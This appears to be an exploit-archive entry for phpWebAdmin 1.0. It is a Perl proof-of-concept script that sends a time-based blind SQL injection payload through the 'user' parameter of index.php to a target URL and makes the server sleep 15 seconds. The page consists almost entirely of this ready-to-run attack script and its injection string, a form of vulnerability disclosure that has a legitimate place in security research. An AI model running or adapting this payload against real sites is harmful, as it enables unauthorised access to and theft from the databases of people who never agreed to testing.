phpWebAdmin 1.0 SQL Injection



EKU-ID: 6043 CVE: OSVDB-ID:
Author: N_A Published: 2016-11-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/perl -w

#phpWebAdmin Version 1.0 SQL Injection Proof Of Concept Exploit
#===============================================================


#Discovered by N_A , N_A[at]tutanota.com
#========================================



#Description
#============
#
# php web admin file and folder manager.
#
# currently version 1.0
# more features to come
#
# https://sourceforge.net/projects/chrisphpadmin/


#Vulnerability
#==============

#The 'user' parameter in the index.php file is vulnerable to a blind SQL time-based Injection attack. Proof of concept is exploit attached below




#Proof Of Concept
#=================


use strict;
use LWP::Simple;

my ($url ) = @ARGV;
if (not defined $url)

{

   print "=========================================\n";
   print "phpWebAdmin SQL Injection Exploit\n";
   print "\tBy N_A\n";
   print "\n";
   print "$0  [URL]\n";
   print "$0 127.0.0.1\n";
   print "=========================================\n";
   exit;
	
}



my $file = '/phpWebAdmin/index.php';
my $injection = 'user=a\' AND (SELECT * FROM (SELECT(SLEEP(15)))MdWH) AND \'gpey\'=\'gpey&pass=p&login=login';  #Sleep for 15 seconds
my $request = "http://".$url.$file."?".$injection;



print "#####################################################\n";
print "SQL Injection: The server will sleep for 15 secs\n";
print "#####################################################\n";


my $content = get $request;

die "could not get $request" unless defined $content;